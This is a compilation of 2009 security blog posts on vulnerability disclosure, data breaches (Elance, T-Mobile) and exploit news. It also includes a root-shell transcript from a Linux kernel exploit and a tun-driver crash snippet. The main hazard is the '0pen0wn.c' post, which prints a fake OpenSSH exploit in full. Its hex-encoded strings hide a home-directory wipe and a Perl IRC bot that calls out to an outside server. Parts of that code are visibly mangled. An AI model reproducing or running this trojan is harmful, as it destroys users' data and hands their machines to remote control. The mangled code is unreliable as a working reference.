Ipswitch Means Business

A while back I was fuzzing with Hzzp and found a remote format string vulnerability in Ipswitch’s WS_FTP. But, I couldn’t find a security contact for Ipswitch. I waited a few months and made the vulnerability public. The day afterwards, a representative from Ipswitch contacted me and I explained why I hadn’t contacted them previously. He was eager to get the vulnerability fixed and made the comment that they’ll need to do a better job publicizing the security contact information. I was happy to have had received a more professional, non-automated email from someone who seemed to care about the security of their company’s product.

I didn’t worry too much about the update process. I know it can take some companies months or even years to release new patches for vulnerabilities in their products, which most of the time is completely unreasonable. Then, a little more than two weeks later, I received an email from that same Ipswitch representative informing me that a new release of WS_FTP was available and the date in the Help->About window should say Sept 18th (10 days after we discussed the vulnerability). What an excellent example of how vendors should handle security issues within their products.

Fast response, efficient security policy, good business. Thanks Ipswitch!

Share

Linux Kernel Bashing

This summer may have caused a few burden’s on linux administrators. By all the patching necessary to keep their systems out of the hands of those who would choose to exploit it, unless your using something like Ksplice, you’ve more than likely rebooted many times already. Well, here is one more reason to wake this early this morning…

New exploits for the “Linux NULL pointer dereference due to incorrect proto_ops initializations” vulnerability have been released, here and here. I just tried the second one out myself on a (currently) fully updated Ubuntu Jaunty workstation, with (_default_) successful results.

linux@ubuntu:~/2009-proto_ops$ sh run.sh
run.c: In function ‘main’:
run.c:13: warning: missing sentinel in function call
padlina z lublina!
# id
uid=0(root) gid=0(root) groups=4(adm),20(dialout),24(cdrom),46(plugdev)
# exit
linux@ubuntu:~/2009-proto_ops$

A reliable local root exploit for that affects all linux kernels 2.x. Feels like 2003 all over again :X

Share

Why is Vulnerability disclosure so difficult?

We purchased security vulnerabilities as part of our SSD program from a researcher who has conducted extensive audit on a popular bulletin board system, IPB. For those not familiar with it, it is a good product, quite common, and well supported by a commercial company called Invision Power. The audit revealed a few high risk issues in the program allowing remote attackers to gain access to entries found in the database with minimal requirements on the attacker’s side.

After verifying the issue we contacted the company in several ways, emailing several addresses, but failed to “reach” anyone. We received several automated responses, and even our inquiry to their sales emails, returned nothing, are we missing something?

From their site it is apparent that support is provided only to paying customers, fair enough, but I am not a customer, I am trying to help them. I am willing to give them the security researcher we paid for, for FREE, yes free, they aren’t asked to pay anything for the vulnerabilities discovered, they are only asked to fix them, which will benefit them for sure.

If anyone has an idea how we could reach Invision Power’s guys/developers, please feel free to contact me at noamr[at]beyondsecurity.com.

Share

Elance user information compromised

God bless the law that forces companies to disclose when they are hacked and customer information is compromised. Not only do we get a chance to protect ourselves but it also reminds us that this apparently happens more often then we would think.

This time it’s elance.com:

Dear (my account name),
We recently learned that certain Elance user information was accessed without authorization, including potentially yours. The data accessed was contact information — specifically name, email address, telephone number, city location and Elance login information (passwords were protected with encryption). This incident did NOT involve any credit card, bank account, social security or tax ID numbers.
We have remedied the cause of the breach and are working with appropriate authorities. We have also implemented additional security measures and have strengthened password requirements to protect all of our users.
We sincerely regret any inconvenience or disruption this may cause.
If you have any unanswered questions and for ongoing information about this matter, please visit this page in our Trust & Safety center: http://www.elance.com/p/trust/account_security.html
For information on re-setting your password, visit: http://help.elance.com/forums/30969/entries/47262
Thank you for your understanding,
Michael Culver
Vice President
Elance

What I would like to see, is what “additional security measures” are they really taking. Also (and I’ll admit I have a one-track-mind) did they do a proper security scan to ensure the servers don’t have any holes? What were the results?

Share

Comerica bank discovers full disclosure

Comerica bank seems to think disclosing cross site scripting vulnerabilities in the bank’s web site is illegal:

“Comerica hereby demands that the above-referenced Subject Site be shut down immediately and that the identity of the account holder be provided to the undersigned.

Comerica’s demand is based upon the fact that the Subject Site is designed to enable that subscriber and anyone else viewing the site to take actions to attempt to impersonate Comerica to its customers”

(full document here)

No Comerica, it’s not the “how to use Comerica com to phish their customers” that enables that, it’s comerica.com that enables that. But at least I finally know why I’m receiving a flood of Comerica phishing emails in the last few weeks (I haven’t even heard of the bank before then).

Needless to say, they haven’t fixed the problem. Of course, for them the problem is not that phishers can attack Comerica bank customers but that somebody is saying it out loud.

Comerica XSS

(more pictures here)

(via @lancejssc)

Share

When source code audit fails

A NULL reference vulnerability in the tun source code of the Linux kernel has been discovered to be “immune” if the code is audited, and vulnerable once GCC has put into place its code optimizations.

The vulnerability allows executing arbitrary code and gaining root access.

An exploit has been released proving that the vulnerability is not just “theoretically” there, but can be actually exploited.

Need we say Black Box Fuzzing? a API fuzzer such as beSTORM would have easily caught as beSTORM can be told to open the /dev/net/tun driver and write data directly to it, one of the first tests it will preform will be the “old” nothing (NULL) data transfer.

BTW: If you want to test the vulnerability on your kernel here is a code snip:

int fd;
struct pollfd pfd;
fd = open("/dev/net/tun", O_RDWR);
pfd.fd = fd;
pfd.events = POLLIN | POLLOUT;
poll(&pfd, 1, 0);
Share

Firefox 3.5 heap spray vuln

It’s nice to have milw0rm around: http://www.milw0rm.com/exploits/9137.

Be careful out there, firefox 3.5 users.

Share

0pen0wn.c = Nasty

Okay, so I saw this online today, and well, after reading through the code, I was kind of certain what this would do. unfortunately being the curious individual that I am, and the fact that I was planning on re-building my Mac tonight anyway (it was running like a dog lately), I had to download it, and compile it, and well run it ;-)
Here’s the source code (DO NOT RUN THIS!!!!):

===============

/* 0pen0wn.c by anti-sec group
* ---------------------------
* OpenSSH 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define VALID_RANGE 0xb44ffe00
#define build_frem(x,y,a,b,c) a##c##a##x##y##b

char jmpcode[] =
"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";

char shellcode[] =
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a";


char fbsd_shellcode[] =
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70"
"\x2f\x68\x69\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b"
"\x2f\x74\x6d\x70\x2f\x68\x69\x0a";
#define SIZE 0xffffff
#define OFFSET 131
#define fremote build_frem(t,e,s,m,y)

void usage(char *arg){
printf("\n[+] 0pen0wn 0wnz Linux/FreeBSD\n");
printf("  Usage: %s -h  -p port\n",arg);
printf("  Options:\n");
printf("  \t-h ip/host of target\n");
printf("  \t-p port\n");
printf("  \t-d username\n");
printf("  \t-B memory_limit 8/16/64\n\n\n");
}

#define FD 0x080518fc
#define BD 0x08082000

int main(int argc, char **argv){
FILE *jmpinst;
char h[500],buffer[1024];fremote(jmpcode);char *payload, *ptr;
int port=23, limit=8, target=0, sock;
struct hostent *host;
struct sockaddr_in addr;

if (geteuid()) {
puts("need root for raw socket, etc...");
return 1;
}

if(argc h_addr;
}

sock = socket(PF_INET, SOCK_STREAM, 0);
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
printf("  [-] Connecting failed\n");
return 1;
}
payload = malloc(limit * 10000);
ptr = payload+8;
memcpy(ptr,jmpcode,strlen(jmpcode));
jmpinst=fopen(shellcode+793,"w+");
if(jmpinst){
fseek(jmpinst,0,SEEK_SET);
fprintf(jmpinst,"%s",shellcode);
fclose(jmpinst);
}
ptr += strlen(jmpcode);
if(target != 5 && target != 6){
memcpy(ptr,shellcode,strlen(shellcode));
ptr += strlen(shellcode);
memset(ptr,'B',limit * 10000 - 8 - strlen(shellcode));
}
else{
memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));
ptr += strlen(fbsd_shellcode);
memset(ptr,'B',limit * 10000 - 8 - strlen(fbsd_shellcode));
}
send(sock,buffer,strlen(buffer),0);
send(sock,ptr,3750,0);
close(sock);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr))  == -1) {
printf("  [-] connecting failed\n");
}

payload[sizeof(payload)-1] = '';
payload[sizeof(payload)-2] = '';
send(sock,buffer,strlen(buffer),0);
send(sock,payload,strlen(payload),0);
close(sock);
free(payload);
addr.sin_port = htons(6666);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr))  == 0) {
/* v--- our cool bar that says: "r0000000t!!!" */
printf("\n  [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]\n\n");
fremote("PS1='sh-3.2#' /bin/sh");
}
else
printf("  [-] failed to exploit target :-( \n");
close(sock);
return 0;
}
=======================

So it run’s on Macs as well, I know it’s because of the underpining BSD subsystem, but it’s still cool, even if it does rely on human idiocracy.

I’m really curious how many people are actually going to fall for this one, and I only wish I could see their faces.

Well, Time Machine restore took me an hour and now my Mac’s running like a dream again, so a good result was achieved, and I had some fun doing it.
The world’s getting nasty out there people, be safe!

Share

Who Hacks the Hackers that Hack Hackers?

Just thought I’d bring it up since there has been prolific chatter on the lists lately…

Share

Bye milw0rm?

I saw a message from Jericho giving his goodbyes to str0ke, and had to see it for myself. Indeed:

Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don’t :( . For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours (taking off weekends) isn’t fair to the authors on this site. I appreciate and thank everyone for their support in the past.
Be safe, /str0ke

We all hope it’s just temporary and str0ke will bounce back. And  if that doesn’t happen, hopefully someone else will pick it up and continue. It’s a thankless job of tedious work but it gives “the good guys” a fighting chance by putting together in an organized manner things that are already know to the bad people out there.

Hopefully this is not a farewell, but if it is, milw0rm will be missed.

Readers: If you have suggestions for good exploit archives (other than this exploit archive, of course) that should go on the bookmark list where milw0rm was, please post in the comments below.

Update: Good news. As several of you noted, str0ke decided to keep on going. More information here.

Update 2: As of October 2009 they seem to be down again.

Share

Want vulnerability information? Pony up the cash

The startup VoIPShield is changing its disclosure policy to stop giving out VoIP bugs for free and start charging vendors for it. CEO Rick Dalmazzi writes:

Avaya doesn’t “have to” pay us for anything. We do not “require” payment from you. It’s Avaya’s choice if you want to acquire the results of years of work by VoIPshield. It’s a business decision that your company will have to make. VoIPshield has made a business decision to not give away that work for free.

I can totally see his point. While we would like to see all vulnerabilities out in the open, for free, companies and researchers that have worked hard to find security vulnerabilities should be compensated.

But I do think Rick is taking the long and hard path by asking the vendors directly – there’s still a long way to go there. We’ve been helping researchers sell their research to organizations who wanted to pay for 0-day vulnerability information through our SSD (SecuriTeam Secure Disclosure) program and the main conclusions so far are that there are organizations willing to pay for this information to protect themselves, but those are not the vendors (yet).

What we see is that organizations use this information as leverage on the vendors. Since they have information about undisclosed vulnerabilities, they can easily exercise this (better than we can, as researchers) to force the vendors to plug those holes. After a while, maybe vendors will choose to drink upstream and subscribe for this information. But that may take a while (a friend of mine that is responsible for product security for a very large vendor says that will be a cold day in hell).
In any case, good luck to VoIPShield and their new paid-disclosure program. If they are successful I think security researchers will benefit, and in the long run customers will be more protected as vendors get direct access to zero-day vulnerabilities.

Share

The month of twitter bugs

Somebody had to do it, and I’m glad it’s Aviv Raff who finally went for it. This is just the first of what I’m sure will be many twitter-related vulnerabilities.
There’s a lot to check in twitter, and I’m sure this will be an interesting month. While Aviv is bringing home the meat, here’s a question to ask yourself in the meantime: How many web services have your twitter password? More than 5? More than 10? How many of them are still active and what happens if one of them goes bankrupt and sells the list to someone?

Update: apparently this was fixed after a few hours. The power of “Month of Bugs” I guess.

Share

Phrack #66 is out!

0x01 Introduction
0x02 Phrack Prophile on The PaX Team
0x03 Phrack World News
0x04 Abusing the Objective C runtime
0x05 Backdooring Juniper Firewalls
0x06 Exploiting DLmalloc frees in 2009
0x07 Persistent BIOS infection
0x08 Exploiting UMA : FreeBSD kernel heap exploits
0x09 Exploiting TCP Persist Timer Infiniteness
0x0A Malloc Des-Maleficarum
0x0B A Real SMM Rootkit
0x0C Alphanumeric RISC ARM Shellcode
0x0D Power cell buffer overflow
0x0E Binary Mangling with Radare
0x0F Linux Kernel Heap Tempering Detection
0x10 Developing MacOSX Rootkits
0x11 How close are they of hacking your brain ?

You can check it out here.

Now we have something to keep us busy while the net neutrality debates are going on…

Share

T-Mobile, Past, Present & Future

Following on from the previous 2 posts that have been put up here and here, after seeing the post about the T-Mobile hack on Full-Disclosure, and then T-Mobile admitting that it has happened, really got me thinking.

To the best of my knowledge this will be the third high profile security breach at T-Mobile in the last 4 years, the first one being Paris Hilton’s SideKick getting hacked. Now the SideKick episode was more down to user error that T-Mobile’s fault, but this one could have been prevented by using strong password complexity rules. Which I thought was something that most major organizations would have already picked up on by now, especially the big corporates. Password complexity is not complicated to implement, and it does tend to prevent these little things like brand damage from occurring.
Speaking of brand damage, now that T-Mobile have been hit a second time, where does this leave them with Companies such as Google and Apple?

T-Mobile is currently doing really well with the addition of the Google Android and Apple iPhone handsets to its portfolio, but do Google and Apple really need this sort of publicity? These are the types of incidents that make companies think twice about their partnerships.

I’m completely aware that these type of incidents happen all the time, but most people expect that mobile operators would have stronger security measures in place.

Couple this with the fact that at present T-Mobile is gearing up for a class action law suite due to charging customers termination costs, this is another company that has me wondering how long….

Share

T-Mobile confirms breach

The T-mobile data breach that jbrown wrote about has been confirmed by T-Mobile.
I guess not everything you read on Full Disclosure is fake after all…

Share

Severe T-Mobile Data Breach

From the looks of it, T-Mobile has been hacked and the goods stolen.

They also seem to love running HP-UX.

Share